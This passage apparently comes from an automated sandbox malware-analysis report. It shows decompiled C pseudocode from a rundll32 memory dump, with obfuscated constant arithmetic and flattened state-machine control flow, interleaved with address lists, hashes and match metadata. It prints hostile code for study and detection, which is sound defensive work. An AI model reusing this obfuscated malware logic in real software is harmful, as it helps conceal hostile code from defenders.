                                                                                                                      							_t311 = E0034AB66(_v1160, _v1096, __eflags);
                                                                                                                      							_t312 = E00345AE2(_v1124);
                                                                                                                      							_t354 =  *0x36520c; // 0x0
                                                                                                                      							_t266 = _t354 + 0x220; // 0x220
                                                                                                                      							_t268 = _t354 + 8; // 0x8
                                                                                                                      							E0035D37B(_t311, __eflags, _v1152, _t312, _t268, _v1116, _t268,  &_v520, _t266, _v1088);
                                                                                                                      							_t307 = E0034AE03(_v1108, _v1128, _v1136, _t311);
                                                                                                                      							_t365 =  &(_t365[0xd]);
                                                                                                                      							_t361 = 0x3cad130;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t373 = _t361 - 0xc947a3e;
                                                                                                                      						if(_t361 != 0xc947a3e) {
                                                                                                                      							goto L8;
                                                                                                                      						}
                                                                                                                      						_push(_v1104);
                                                                                                                      						_push(_v1156);
                                                                                                                      						_push(0x3410cc);
                                                                                                                      						_t314 = E0034AB66(_v1072, _v1080, _t373);
                                                                                                                      						_t332 =  *0x36520c; // 0x0
                                                                                                                      						_t334 =  *0x36520c; // 0x0
                                                                                                                      						E0034E7CE(_t314, _t373, _v1056, _t334 + 8, _t332 + 0x220, _v1064, _v1060, _v1112, _v1084, _t332 + 0x220);
                                                                                                                      						_t307 = E0034AE03(_v1148, _v1140, _v1076, _t314);
                                                                                                                      						_t365 =  &(_t365[0xd]);
                                                                                                                      						_t361 = 0xac73e1e;
                                                                                                                      					}
                                                                                                                      					_t361 = 0xc947a3e;
                                                                                                                      					L8:
                                                                                                                      					__eflags = _t361 - 0x9b97ca4;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t307;
                                                                                                                      			}




















































                                                                                                                      0x00342afe
                                                                                                                      0x00342b06
                                                                                                                      0x00342b10
                                                                                                                      0x00342b19
                                                                                                                      0x00342b1d
                                                                                                                      0x00342b25
                                                                                                                      0x00342b2d
                                                                                                                      0x00342b3a
                                                                                                                      0x00342b3e
                                                                                                                      0x00342b46
                                                                                                                      0x00342b4e
                                                                                                                      0x00342b56
                                                                                                                      0x00342b5b
                                                                                                                      0x00342b63
                                                                                                                      0x00342b6b
                                                                                                                      0x00342b73
                                                                                                                      0x00342b7b
                                                                                                                      0x00342b83
                                                                                                                      0x00342b8b
                                                                                                                      0x00342b93
                                                                                                                      0x00342b98
                                                                                                                      0x00342ba0
                                                                                                                      0x00342ba8
                                                                                                                      0x00342bb0
                                                                                                                      0x00342bb5
                                                                                                                      0x00342bbd
                                                                                                                      0x00342bc5
                                                                                                                      0x00342bcd
                                                                                                                      0x00342bd5
                                                                                                                      0x00342bda
                                                                                                                      0x00342bdf
                                                                                                                      0x00342be7
                                                                                                                      0x00342bf4
                                                                                                                      0x00342bf8
                                                                                                                      0x00342bfd
                                                                                                                      0x00342c07
                                                                                                                      0x00342c0f
                                                                                                                      0x00342c1a
                                                                                                                      0x00342c1d
                                                                                                                      0x00342c21
                                                                                                                      0x00342c31
                                                                                                                      0x00342c45
                                                                                                                      0x00342c45
                                                                                                                      0x00342c53
                                                                                                                      0x00342d77
                                                                                                                      0x00342d7f
                                                                                                                      0x00342d80
                                                                                                                      0x00000000
                                                                                                                      0x00342d91
                                                                                                                      0x00342c5b
                                                                                                                      0x00342cea
                                                                                                                      0x00342cee
                                                                                                                      0x00342cfa
                                                                                                                      0x00342cff
                                                                                                                      0x00342d0d
                                                                                                                      0x00342d16
                                                                                                                      0x00342d1c
                                                                                                                      0x00342d2b
                                                                                                                      0x00342d3f
                                                                                                                      0x00342d51
                                                                                                                      0x00342d56
                                                                                                                      0x00342d59
                                                                                                                      0x00000000
                                                                                                                      0x00342d59
                                                                                                                      0x00342c61
                                                                                                                      0x00342c63
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00342c69
                                                                                                                      0x00342c6d
                                                                                                                      0x00342c79
                                                                                                                      0x00342c7e
                                                                                                                      0x00342c83
                                                                                                                      0x00342cae
                                                                                                                      0x00342cc6
                                                                                                                      0x00342cdb
                                                                                                                      0x00342ce0
                                                                                                                      0x00342ce3
                                                                                                                      0x00342ce3
                                                                                                                      0x00342d60
                                                                                                                      0x00342d62
                                                                                                                      0x00342d62
                                                                                                                      0x00342d62
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D'j$KE.$U)$j$l}$wt
                                                                                                                      • API String ID: 0-3929749274
                                                                                                                      • Opcode ID: 4beb3a234f8651444a99a5f8c89bebd00b3e109bbb9e41b8467314dcc3b9540c
                                                                                                                      • Instruction ID: 6cfccaab21c2a3fd0c2148b2ac8b61e7c3252bdc9e280afb0ebaf6a95c74a240
                                                                                                                      • Opcode Fuzzy Hash: 4beb3a234f8651444a99a5f8c89bebd00b3e109bbb9e41b8467314dcc3b9540c
                                                                                                                      • Instruction Fuzzy Hash: 3AD12F724083809FC369CF65C58A90BFBE1FBC5748F508A1DF1A69A260D7B59948CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0035129C(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				void* _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				char _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				unsigned int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				void* _t225;
                                                                                                                      				signed int _t257;
                                                                                                                      				signed int* _t258;
                                                                                                                      				void* _t260;
                                                                                                                      				signed int _t295;
                                                                                                                      				signed int _t296;
                                                                                                                      				signed int _t297;
                                                                                                                      				signed int _t298;
                                                                                                                      				signed int _t299;
                                                                                                                      				signed int _t300;
                                                                                                                      				signed int* _t305;
                                                                                                                      				void* _t308;
                                                                                                                      
                                                                                                                      				_t302 = _a8;
                                                                                                                      				_t258 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t225);
                                                                                                                      				_v20 = 0x578391;
                                                                                                                      				_t305 =  &(( &_v164)[4]);
                                                                                                                      				asm("stosd");
                                                                                                                      				_t260 = 0x3e847b6;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v136 = 0x7901e7;
                                                                                                                      				_v136 = _v136 ^ 0x0e05b978;
                                                                                                                      				_v136 = _v136 | 0x8500df2f;
                                                                                                                      				_v136 = _v136 ^ 0x8f7cffbf;
                                                                                                                      				_v72 = 0x5c6105;
                                                                                                                      				_v72 = _v72 ^ 0xba418fb0;
                                                                                                                      				_v72 = _v72 ^ 0xba16afcf;
                                                                                                                      				_v156 = 0xc57f64;
                                                                                                                      				_v156 = _v156 << 0xe;
                                                                                                                      				_v156 = _v156 | 0xac310e4c;
                                                                                                                      				_t295 = 0x48;
                                                                                                                      				_v156 = _v156 / _t295;
                                                                                                                      				_v156 = _v156 ^ 0x038a2108;
                                                                                                                      				_v100 = 0xf9dfe5;
                                                                                                                      				_v100 = _v100 >> 0xc;
                                                                                                                      				_v100 = _v100 ^ 0x0009d912;
                                                                                                                      				_v112 = 0xb5688b;
                                                                                                                      				_t296 = 0x3d;
                                                                                                                      				_v112 = _v112 / _t296;
                                                                                                                      				_v112 = _v112 ^ 0x00064c77;
                                                                                                                      				_v116 = 0x80f1cc;
                                                                                                                      				_v116 = _v116 + 0xfffff23f;
                                                                                                                      				_v116 = _v116 ^ 0x008ab174;
                                                                                                                      				_v92 = 0xc78857;
                                                                                                                      				_v92 = _v92 | 0x5f9c477c;
                                                                                                                      				_v92 = _v92 ^ 0x5fdf5dba;
                                                                                                                      				_v148 = 0x3d8773;
                                                                                                                      				_v148 = _v148 >> 0xa;
                                                                                                                      				_v148 = _v148 | 0x15c33ced;
                                                                                                                      				_v148 = _v148 + 0xffff6977;
                                                                                                                      				_v148 = _v148 ^ 0x15c9e03a;
                                                                                                                      				_v140 = 0x8050fd;
                                                                                                                      				_v140 = _v140 + 0xffffb165;
                                                                                                                      				_v140 = _v140 ^ 0xb13fe806;
                                                                                                                      				_v140 = _v140 ^ 0xb1b5a353;
                                                                                                                      				_v104 = 0x3fa35;
                                                                                                                      				_v104 = _v104 ^ 0x0635ab8b;
                                                                                                                      				_v104 = _v104 ^ 0x0638ddfb;
                                                                                                                      				_v128 = 0x6276d2;
                                                                                                                      				_v128 = _v128 * 0x67;
                                                                                                                      				_v128 = _v128 >> 7;
                                                                                                                      				_v128 = _v128 ^ 0x004624e6;
                                                                                                                      				_v84 = 0xb2127e;
                                                                                                                      				_v84 = _v84 ^ 0xdd4df2db;
                                                                                                                      				_v84 = _v84 ^ 0xddf0f9d7;
                                                                                                                      				_v108 = 0x825106;
                                                                                                                      				_v108 = _v108 + 0x54ee;
                                                                                                                      				_v108 = _v108 ^ 0x00831379;
                                                                                                                      				_v96 = 0x675ffa;
                                                                                                                      				_v96 = _v96 + 0xffff86b7;
                                                                                                                      				_v96 = _v96 ^ 0x0064c66c;
                                                                                                                      				_v132 = 0x78c111;
                                                                                                                      				_v132 = _v132 >> 0xb;
                                                                                                                      				_v132 = _v132 + 0xffff7c58;
                                                                                                                      				_v132 = _v132 ^ 0xfff3b3ba;
                                                                                                                      				_v164 = 0xbe0848;
                                                                                                                      				_t297 = 0x46;
                                                                                                                      				_v164 = _v164 / _t297;
                                                                                                                      				_v164 = _v164 << 4;
                                                                                                                      				_v164 = _v164 >> 5;
                                                                                                                      				_v164 = _v164 ^ 0x00009249;
                                                                                                                      				_v152 = 0xd46630;
                                                                                                                      				_v152 = _v152 | 0x25786146;
                                                                                                                      				_v152 = _v152 << 6;
                                                                                                                      				_t298 = 0x4f;
                                                                                                                      				_v152 = _v152 / _t298;
                                                                                                                      				_v152 = _v152 ^ 0x0191f926;
                                                                                                                      				_v144 = 0xf6674c;
                                                                                                                      				_v144 = _v144 >> 6;
                                                                                                                      				_v144 = _v144 ^ 0xb535724d;
                                                                                                                      				_v144 = _v144 ^ 0xb53e6a0f;
                                                                                                                      				_v160 = 0x2a1e3b;
                                                                                                                      				_v160 = _v160 >> 5;
                                                                                                                      				_t299 = 0x76;
                                                                                                                      				_v160 = _v160 / _t299;
                                                                                                                      				_v160 = _v160 << 7;
                                                                                                                      				_v160 = _v160 ^ 0x00046312;
                                                                                                                      				_v120 = 0xf44552;
                                                                                                                      				_v120 = _v120 + 0xbd95;
                                                                                                                      				_v120 = _v120 ^ 0x00f02cb9;
                                                                                                                      				_v76 = 0x9a2b11;
                                                                                                                      				_v76 = _v76 << 6;
                                                                                                                      				_v76 = _v76 ^ 0x2684a730;
                                                                                                                      				_v80 = 0x6aeef9;
                                                                                                                      				_t300 = 0x51;
                                                                                                                      				_v80 = _v80 / _t300;
                                                                                                                      				_v80 = _v80 ^ 0x000c464e;
                                                                                                                      				_v124 = 0x84a5f5;
                                                                                                                      				_v124 = _v124 << 5;
                                                                                                                      				_v124 = _v124 + 0xddfe;
                                                                                                                      				_v124 = _v124 ^ 0x10975fd7;
                                                                                                                      				_v88 = 0xa441a9;
                                                                                                                      				_v88 = _v88 + 0x5567;
                                                                                                                      				_v88 = _v88 ^ 0x00aef9b7;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t308 = _t260 - 0x8801db7;
                                                                                                                      						if(_t308 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t308 == 0) {
                                                                                                                      							E0035F88F(_t302 + 0x1c,  &_v68, __eflags, _v80, _v124, _v88);
                                                                                                                      						} else {
                                                                                                                      							if(_t260 == 0x235eed) {
                                                                                                                      								E00354D91( *((intOrPtr*)(_t302 + 0x18)),  &_v68, _v164, _v152);
                                                                                                                      								_t305 =  &(_t305[2]);
                                                                                                                      								_t260 = 0x85d9450;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t260 == 0x3e847b6) {
                                                                                                                      									_t260 = 0xab5e479;
                                                                                                                      									 *_t258 =  *_t258 & 0x00000000;
                                                                                                                      									_t258[1] = _v136;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t260 == 0x6ea21eb) {
                                                                                                                      										E00354D91( *((intOrPtr*)(_t302 + 0x24)),  &_v68, _v84, _v108);
                                                                                                                      										_t305 =  &(_t305[2]);
                                                                                                                      										_t260 = 0x9265c01;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t260 == 0x80db57c) {
                                                                                                                      											E00354D91( *((intOrPtr*)(_t302 + 0x30)),  &_v68, _v120, _v76);
                                                                                                                      											_t305 =  &(_t305[2]);
                                                                                                                      											_t260 = 0x8801db7;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t260 != 0x85d9450) {
                                                                                                                      												goto L24;
                                                                                                                      											} else {
                                                                                                                      												E00354D91( *((intOrPtr*)(_t302 + 0x38)),  &_v68, _v144, _v160);
                                                                                                                      												_t305 =  &(_t305[2]);
                                                                                                                      												_t260 = 0x80db57c;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L27:
                                                                                                                      						__eflags =  *_t258;
                                                                                                                      						_t224 =  *_t258 != 0;
                                                                                                                      						__eflags = _t224;
                                                                                                                      						return 0 | _t224;
                                                                                                                      					}
                                                                                                                      					__eflags = _t260 - 0x9265c01;
                                                                                                                      					if(_t260 == 0x9265c01) {
                                                                                                                      						E00354D91( *((intOrPtr*)(_t302 + 0x34)),  &_v68, _v96, _v132);
                                                                                                                      						_t305 =  &(_t305[2]);
                                                                                                                      						_t260 = 0x235eed;
                                                                                                                      						goto L24;
                                                                                                                      					} else {
                                                                                                                      						__eflags = _t260 - 0xa20e3fb;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E0035F88F(_t302 + 8,  &_v68, __eflags, _v140, _v104, _v128);
                                                                                                                      							_t305 =  &(_t305[3]);
                                                                                                                      							_t260 = 0x6ea21eb;
                                                                                                                      							goto L1;
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t260 - 0xab5e479;
                                                                                                                      							if(_t260 == 0xab5e479) {
                                                                                                                      								_t258[1] = E0036146E(_t302);
                                                                                                                      								_t260 = 0xffaf556;
                                                                                                                      								goto L1;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t260 - 0xf4853c6;
                                                                                                                      								if(_t260 == 0xf4853c6) {
                                                                                                                      									E003564C5(_v112, _v116, _v92, _v148, _t258,  &_v68);
                                                                                                                      									_t305 =  &(_t305[4]);
                                                                                                                      									_t260 = 0xa20e3fb;
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t260 - 0xffaf556;
                                                                                                                      									if(_t260 != 0xffaf556) {
                                                                                                                      										goto L24;
                                                                                                                      									} else {
                                                                                                                      										_push(_t260);
                                                                                                                      										_push(_t260);
                                                                                                                      										_t257 = E00353512(_t258[1]);
                                                                                                                      										 *_t258 = _t257;
                                                                                                                      										__eflags = _t257;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t260 = 0xf4853c6;
                                                                                                                      											goto L1;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L27;
                                                                                                                      					L24:
                                                                                                                      					__eflags = _t260 - 0x1d5478a;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L27;
                                                                                                                      			}










































                                                                                                                      0x003515ab
                                                                                                                      0x003515ab
                                                                                                                      0x003515ab
                                                                                                                      0x003515ad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003515b3
                                                                                                                      0x0035176b
                                                                                                                      0x003515b9
                                                                                                                      0x003515bf
                                                                                                                      0x00351666
                                                                                                                      0x0035166b
                                                                                                                      0x0035166e
                                                                                                                      0x00000000
                                                                                                                      0x003515c5
                                                                                                                      0x003515cb
                                                                                                                      0x00351647
                                                                                                                      0x0035164c
                                                                                                                      0x0035164f
                                                                                                                      0x00000000
                                                                                                                      0x003515cd
                                                                                                                      0x003515d3
                                                                                                                      0x00351631
                                                                                                                      0x00351636
                                                                                                                      0x00351639
                                                                                                                      0x00000000
                                                                                                                      0x003515d5
                                                                                                                      0x003515db
                                                                                                                      0x00351616
                                                                                                                      0x0035161b
                                                                                                                      0x0035161e
                                                                                                                      0x00000000
                                                                                                                      0x003515dd
                                                                                                                      0x003515e3
                                                                                                                      0x00000000
                                                                                                                      0x003515e9
                                                                                                                      0x003515f8
                                                                                                                      0x003515fd
                                                                                                                      0x00351600
                                                                                                                      0x00000000
                                                                                                                      0x00351600
                                                                                                                      0x003515e3
                                                                                                                      0x003515db
                                                                                                                      0x003515d3
                                                                                                                      0x003515cb
                                                                                                                      0x003515bf
                                                                                                                      0x00351774
                                                                                                                      0x00351776
                                                                                                                      0x0035177a
                                                                                                                      0x0035177a
                                                                                                                      0x00351784
                                                                                                                      0x00351784
                                                                                                                      0x00351678
                                                                                                                      0x0035167e
                                                                                                                      0x0035173d
                                                                                                                      0x00351742
                                                                                                                      0x00351745
                                                                                                                      0x00000000
                                                                                                                      0x00351684
                                                                                                                      0x00351684
                                                                                                                      0x0035168a
                                                                                                                      0x0035171c
                                                                                                                      0x00351721
                                                                                                                      0x00351724
                                                                                                                      0x00000000
                                                                                                                      0x0035168c
                                                                                                                      0x0035168c
                                                                                                                      0x00351692
                                                                                                                      0x003516fc
                                                                                                                      0x003516ff
                                                                                                                      0x00000000
                                                                                                                      0x00351694
                                                                                                                      0x00351694
                                                                                                                      0x00351696
                                                                                                                      0x003516e3
                                                                                                                      0x003516e8
                                                                                                                      0x003516eb
                                                                                                                      0x00000000
                                                                                                                      0x00351698
                                                                                                                      0x00351698
                                                                                                                      0x0035169e
                                                                                                                      0x00000000
                                                                                                                      0x003516a4
                                                                                                                      0x003516b0
                                                                                                                      0x003516b1
                                                                                                                      0x003516b5
                                                                                                                      0x003516ba
                                                                                                                      0x003516be
                                                                                                                      0x003516c0
                                                                                                                      0x003516c6
                                                                                                                      0x00000000
                                                                                                                      0x003516c6
                                                                                                                      0x003516c0
                                                                                                                      0x0035169e
                                                                                                                      0x00351696
                                                                                                                      0x00351692
                                                                                                                      0x0035168a
                                                                                                                      0x00000000
                                                                                                                      0x0035174a
                                                                                                                      0x0035174a
                                                                                                                      0x0035174a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Fax%$gU$$F$T$^#$^#
                                                                                                                      • API String ID: 0-2311862416
                                                                                                                      • Opcode ID: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction ID: 6fbedce9db30818865b9a1abf5b0ef798e5f4f826f962f2e3669872cd32ae1a1
                                                                                                                      • Opcode Fuzzy Hash: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction Fuzzy Hash: ECC142715087809FC759CF64C88991FBBF2FBC5719F144A1DFA864A260D3B58949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 74%
                                                                                                                      			E0035363D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				char _v68;
                                                                                                                      				char _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				char _t264;
                                                                                                                      				signed int _t295;
                                                                                                                      				signed int _t298;
                                                                                                                      				signed int _t299;
                                                                                                                      				signed int _t300;
                                                                                                                      				signed int _t301;
                                                                                                                      				signed int _t302;
                                                                                                                      				signed int _t303;
                                                                                                                      				signed int _t304;
                                                                                                                      				void* _t307;
                                                                                                                      				void* _t308;
                                                                                                                      				void* _t334;
                                                                                                                      				intOrPtr _t335;
                                                                                                                      				signed int* _t338;
                                                                                                                      
                                                                                                                      				_push(_a28);
                                                                                                                      				_t334 = __ecx;
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(0);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_t264 = E0034CF25(0);
                                                                                                                      				_v72 = _t264;
                                                                                                                      				_t335 = _t264;
                                                                                                                      				_v124 = 0xc44be;
                                                                                                                      				_t338 =  &(( &_v176)[9]);
                                                                                                                      				_v124 = _v124 + 0xffff24c4;
                                                                                                                      				_t307 = 0xc36eaf9;
                                                                                                                      				_t298 = 0x37;
                                                                                                                      				_v124 = _v124 * 0x2e;
                                                                                                                      				_v124 = _v124 ^ 0x020cf15c;
                                                                                                                      				_v176 = 0xedca77;
                                                                                                                      				_v176 = _v176 * 0x1f;
                                                                                                                      				_v176 = _v176 << 4;
                                                                                                                      				_v176 = _v176 + 0xdbf9;
                                                                                                                      				_v176 = _v176 ^ 0xccb922a9;
                                                                                                                      				_v120 = 0x5a606;
                                                                                                                      				_v120 = _v120 | 0xc9e49228;
                                                                                                                      				_t299 = 0x62;
                                                                                                                      				_v120 = _v120 / _t298;
                                                                                                                      				_v120 = _v120 ^ 0x03ad0d8c;
                                                                                                                      				_v144 = 0x918442;
                                                                                                                      				_v144 = _v144 >> 0xd;
                                                                                                                      				_v144 = _v144 * 0x3e;
                                                                                                                      				_v144 = _v144 + 0xa3d5;
                                                                                                                      				_v144 = _v144 ^ 0x0007140c;
                                                                                                                      				_v88 = 0x37923f;
                                                                                                                      				_v88 = _v88 ^ 0x32449291;
                                                                                                                      				_v88 = _v88 ^ 0x3276c44e;
                                                                                                                      				_v168 = 0xa5175f;
                                                                                                                      				_v168 = _v168 + 0x6cd0;
                                                                                                                      				_v168 = _v168 >> 0xd;
                                                                                                                      				_v168 = _v168 + 0x50d;
                                                                                                                      				_v168 = _v168 ^ 0x000b28ed;
                                                                                                                      				_v96 = 0x8bb9e8;
                                                                                                                      				_v96 = _v96 ^ 0x9313002a;
                                                                                                                      				_v96 = _v96 ^ 0x93929827;
                                                                                                                      				_v128 = 0x9b97bd;
                                                                                                                      				_v128 = _v128 >> 9;
                                                                                                                      				_v128 = _v128 + 0x506c;
                                                                                                                      				_v128 = _v128 ^ 0x0008f405;
                                                                                                                      				_v136 = 0x162b;
                                                                                                                      				_v136 = _v136 << 0xe;
                                                                                                                      				_v136 = _v136 ^ 0xcbe41246;
                                                                                                                      				_v136 = _v136 ^ 0xce6e1682;
                                                                                                                      				_v160 = 0xb72d70;
                                                                                                                      				_v160 = _v160 >> 8;
                                                                                                                      				_v160 = _v160 ^ 0x815bd7a2;
                                                                                                                      				_v160 = _v160 ^ 0x177336f3;
                                                                                                                      				_v160 = _v160 ^ 0x962c98d3;
                                                                                                                      				_v100 = 0xe545e5;
                                                                                                                      				_v100 = _v100 + 0xffffaae8;
                                                                                                                      				_v100 = _v100 | 0x514a639c;
                                                                                                                      				_v100 = _v100 ^ 0x51eea269;
                                                                                                                      				_v152 = 0xd9d32c;
                                                                                                                      				_v152 = _v152 >> 8;
                                                                                                                      				_v152 = _v152 ^ 0x78b07b8d;
                                                                                                                      				_v152 = _v152 / _t299;
                                                                                                                      				_v152 = _v152 ^ 0x01343475;
                                                                                                                      				_v92 = 0x6219a9;
                                                                                                                      				_v92 = _v92 << 8;
                                                                                                                      				_v92 = _v92 ^ 0x6210c938;
                                                                                                                      				_v80 = 0x3ff2a1;
                                                                                                                      				_v80 = _v80 + 0xffff7ea3;
                                                                                                                      				_v80 = _v80 ^ 0x003f2f73;
                                                                                                                      				_v164 = 0xe5565b;
                                                                                                                      				_v164 = _v164 + 0xffff5b62;
                                                                                                                      				_t300 = 0x78;
                                                                                                                      				_v164 = _v164 * 6;
                                                                                                                      				_v164 = _v164 / _t300;
                                                                                                                      				_v164 = _v164 ^ 0x000727eb;
                                                                                                                      				_v76 = 0x250d2;
                                                                                                                      				_v76 = _v76 | 0x8f851c12;
                                                                                                                      				_v76 = _v76 ^ 0x8f8220e2;
                                                                                                                      				_v116 = 0x568e;
                                                                                                                      				_v116 = _v116 ^ 0x3d61f204;
                                                                                                                      				_v116 = _v116 << 7;
                                                                                                                      				_v116 = _v116 ^ 0xb0d54eba;
                                                                                                                      				_v172 = 0xa5a4a3;
                                                                                                                      				_v172 = _v172 | 0xd2f7b266;
                                                                                                                      				_v172 = _v172 >> 0xd;
                                                                                                                      				_t301 = 0x7f;
                                                                                                                      				_v172 = _v172 * 0x30;
                                                                                                                      				_v172 = _v172 ^ 0x0132b547;
                                                                                                                      				_v112 = 0xd0329d;
                                                                                                                      				_v112 = _v112 * 0x58;
                                                                                                                      				_v112 = _v112 << 3;
                                                                                                                      				_v112 = _v112 ^ 0x3c81866c;
                                                                                                                      				_v104 = 0x844e69;
                                                                                                                      				_v104 = _v104 << 0xc;
                                                                                                                      				_v104 = _v104 >> 4;
                                                                                                                      				_v104 = _v104 ^ 0x0443b556;
                                                                                                                      				_v84 = 0x1d6374;
                                                                                                                      				_v84 = _v84 >> 0xd;
                                                                                                                      				_v84 = _v84 ^ 0x000df0de;
                                                                                                                      				_v148 = 0x6585fd;
                                                                                                                      				_v148 = _v148 / _t301;
                                                                                                                      				_t302 = 0x77;
                                                                                                                      				_v148 = _v148 / _t302;
                                                                                                                      				_v148 = _v148 >> 0xa;
                                                                                                                      				_v148 = _v148 ^ 0x000a9d1a;
                                                                                                                      				_v156 = 0xff5a31;
                                                                                                                      				_v156 = _v156 + 0xce45;
                                                                                                                      				_t303 = 0x29;
                                                                                                                      				_v156 = _v156 / _t303;
                                                                                                                      				_v156 = _v156 << 1;
                                                                                                                      				_v156 = _v156 ^ 0x0008392b;
                                                                                                                      				_v132 = 0x13d5b5;
                                                                                                                      				_v132 = _v132 << 0x10;
                                                                                                                      				_v132 = _v132 + 0xffff95f7;
                                                                                                                      				_v132 = _v132 ^ 0xd5b1b27f;
                                                                                                                      				_v108 = 0x3556bb;
                                                                                                                      				_v108 = _v108 * 0x4f;
                                                                                                                      				_v108 = _v108 + 0xffff90f3;
                                                                                                                      				_v108 = _v108 ^ 0x10791788;
                                                                                                                      				_v140 = 0x81de0d;
                                                                                                                      				_t304 = 0x6d;
                                                                                                                      				_v140 = _v140 / _t304;
                                                                                                                      				_v140 = _v140 + 0xf4b;
                                                                                                                      				_v140 = _v140 * 0x26;
                                                                                                                      				_v140 = _v140 ^ 0x002a9917;
                                                                                                                      				do {
                                                                                                                      					while(_t307 != 0x688d2d5) {
                                                                                                                      						if(_t307 == 0x8a4f536) {
                                                                                                                      							_t295 = E00355B0E(_a28, _v120,  &_v72, _v144);
                                                                                                                      							_t338 =  &(_t338[3]);
                                                                                                                      							__eflags = _t295;
                                                                                                                      							if(_t295 != 0) {
                                                                                                                      								_t307 = 0x688d2d5;
